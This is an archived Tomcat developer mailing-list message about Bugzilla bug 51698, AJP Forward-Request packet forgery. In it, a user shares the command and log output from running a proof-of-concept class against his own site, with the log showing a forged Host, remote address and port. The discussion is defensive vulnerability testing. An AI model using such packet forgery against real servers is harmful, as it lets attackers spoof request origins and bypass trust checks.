tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From bugzi...@apache.org
Subject DO NOT REPLY [Bug 51698] ajp CPing/Forward-Request packet forgery, is a design decision? or a security vulnerability?
Date Fri, 02 Sep 2011 10:35:50 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=51698

--- Comment #3 from Edward Quick <edwardquick@hotmail.com> 2011-09-02 10:35:50 UTC ---
Hi there, I was testing this out to see if my site was vulnerable and got the
following results. I'm not sure looking at the code comments in
ForwardRequestForgeryExample.java if the output below means it's vulnerable and
what exactly that exploited. Could you help me out a bit please?

Thanks,
Ed.

C:>java -cp . ForwardRequestForgeryExample
Sending AJP Forward-Request Packet...
End

$ tail -f catalina.out
Invoke HelloWorldExample.doPost method:
-------------------------------------------
Host: my.evil-site.com
RemoteAddr: 1.2.3.4
LocalPort: 999
woo: I am here

-- 
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org


Mime
View raw message